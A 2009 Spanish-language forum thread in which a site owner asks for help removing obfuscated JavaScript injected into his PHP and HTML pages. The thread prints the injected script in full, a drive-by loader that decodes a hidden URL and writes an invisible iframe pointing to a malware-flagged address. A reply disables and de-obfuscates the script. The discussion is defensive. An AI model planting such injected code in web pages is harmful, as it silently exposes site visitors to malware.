eliminar javascript en mi codigo PHP

bcfiguer · #1 (**permalink**) 14/09/2009, 08:05

Hola;

tengo una página web, y hace un rato, en ciertas páginas, se me ha puesto un javascript invisible, que no se ve en el código, pero cuando me meto a la página y veo el codigo a través de: "ver codigo fuente de pagina" de la opcion de chrome, se ve un javascript, que me baja informacion de otra.

La cuestion es que no he podido eliminar ese javascript (sobre todo pensando que no lo veo cuando abro mi .php), por lo que no se si hay alguien que me pueda ayudar, ya que no quiero que a cualquiera que entre a mi pagina, se le baje ese javascript (ya que esa direccion del javascipt google lo reconoce como malware)

gracias

abimaelrc · #2 (**permalink**) 14/09/2009, 08:07

¿Tu pagina lee de mysql? Si es así busca en la base de datos que ahi debe estar guardado ese javascript

GatorV · #3 (**permalink**) 14/09/2009, 08:26

Tema trasladado desde PHP

bcfiguer · #4 (**permalink**) 14/09/2009, 15:49

Si...mi pagina lee de mysql...pero no se en que tabla buscar el javascript...como podria llegar a saberlo?

gracias

bcfiguer · #5 (**permalink**) 14/09/2009, 16:04

la cuestion es que en todas los .php que creo, se me agrega solo lo siguiente:

<script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height: 1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f .6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6 c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script>

y no se como hacer para que no se me agregue esto

bcfiguer · #6 (**permalink**) 14/09/2009, 16:33

se me olvido decir que incluso ese script me sale hasta cuando no genero intersaccion con la base de datos

koder5 · #7 (**permalink**) 14/09/2009, 18:00

Cita:

Iniciado por bcfiguer

se me olvido decir que incluso ese script me sale hasta cuando no genero intersaccion con la base de datos

Hola, creo saber de dónde está viniendo el problema, vos tenés tu dominio manejado por algún proveedor de free DNS? porque si es así a casi todos los usuarios les inyecta javascript con alguna especie de propaganda o algún robot de alguna especie. Tendrías que verificar esto, porque para mí viene del proveedor de hosting o de free DNS. Saludos.

pato12 · #8 (**permalink**) 14/09/2009, 18:16

Cita:

Iniciado por koder5

Hola, creo saber de dónde está viniendo el problema, vos tenés tu dominio manejado por algún proveedor de free DNS? porque si es así a casi todos los usuarios les inyecta javascript con alguna especie de propaganda o algún robot de alguna especie. Tendrías que verificar esto, porque para mí viene del proveedor de hosting o de free DNS. Saludos.

Hola,
No creo... para que inyectar un iframe oculto. Y creo que es un codigo malisioso, porque firefox no te deja entrar a la pagina del iframe.
El codigo es:

Código javascript:

Ver original<script>
// NO EJECUTAR CODIGO, ESTA DESACTIVADO, PERO SI DESCOMENTAN LA ULTIMA LINEA YA NO
var YtJzBU=document;
function UvrUmwYA(fXCunYmB){
    var DdKQrsBtb = "",MAueQJPqK=0;
    for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--){
        DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);
    }
    return DdKQrsBtb;
}
function lAzxGtC(XFRZIMF_){
    XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");
    XFRZIMF_=unescape(XFRZIMF_);
    return UvrUmwYA(XFRZIMF_);
}
function gqDmBRQ(){
    YtJzBU.write("<style>.JIjzCtPmog{width:1px;height: 1px;border:none;visibility:hidden}</style>");
    var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";
    var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f .6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6 c.2e.77.77.77.2f.2f.3a.70.74.74.68"));
    return eukscm;
}
//YtJzBU.writeln(gqDmBRQ());
</script>

Y este es el mismo codigo, pero que se entienda mejor:

Código javascript:

Ver original<script>
var documento=document;
function desencriptarRe(url){
    var final = "",numerok=0;
    for(numerok=url.length-1;numerok >= 0;numerok--){
        final+=url.charAt(numerok);
    }
    return final;
}
function desencriptar(codigo){
    codigo=codigo.replace(/[\.]/g, "%");
    codigo=unescape(codigo);
    return desencriptarRe(codigo);
}
function getIfram(){
//  documento.write("<style>.JIjzCtPmog{width:1px;height: 1px;border:none;visibility:hidden}</style>");
//  var html="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";
    var html="x";
    var html_final=html.replace(/[\+x]/g,desencriptar(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f .6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6 c.2e.77.77.77.2f.2f.3a.70.74.74.68"));
    return html_final;
}
documento.writeln(getIfram());
</script>

Este ultimo si es seguro ejecutar, lo que va a hacer es imprimir la url del iframe. Pero como esta mal el codigo, la url esta mal ;) si el codigo que posteaste es el mismo, no te preocupes porque el que lo inyecto lo puso mal.
Suerte
Salu2

bcfiguer · #9 (**permalink**) 14/09/2009, 20:11

Hola;

es un codigo malisisio que se me mete en todos los .php y .html que estoy creando, cuando los veo en algun navegador.

este es un ejemplo:
w.jsf.y/jp2/aver/n.x

la cosa es que nose como hacer para que ese script no se me meta en el codigo,

gracias

bcfiguer · #10 (**permalink**) 14/09/2009, 20:12

la w -> www
la y -> cl
la x -> php

y ahi se pueden meter a la pagina

bcfiguer · #11 (**permalink**) 16/09/2009, 17:38

nadie sabe como hacer para que ese script no se me meta a mis .php y .html?

gracias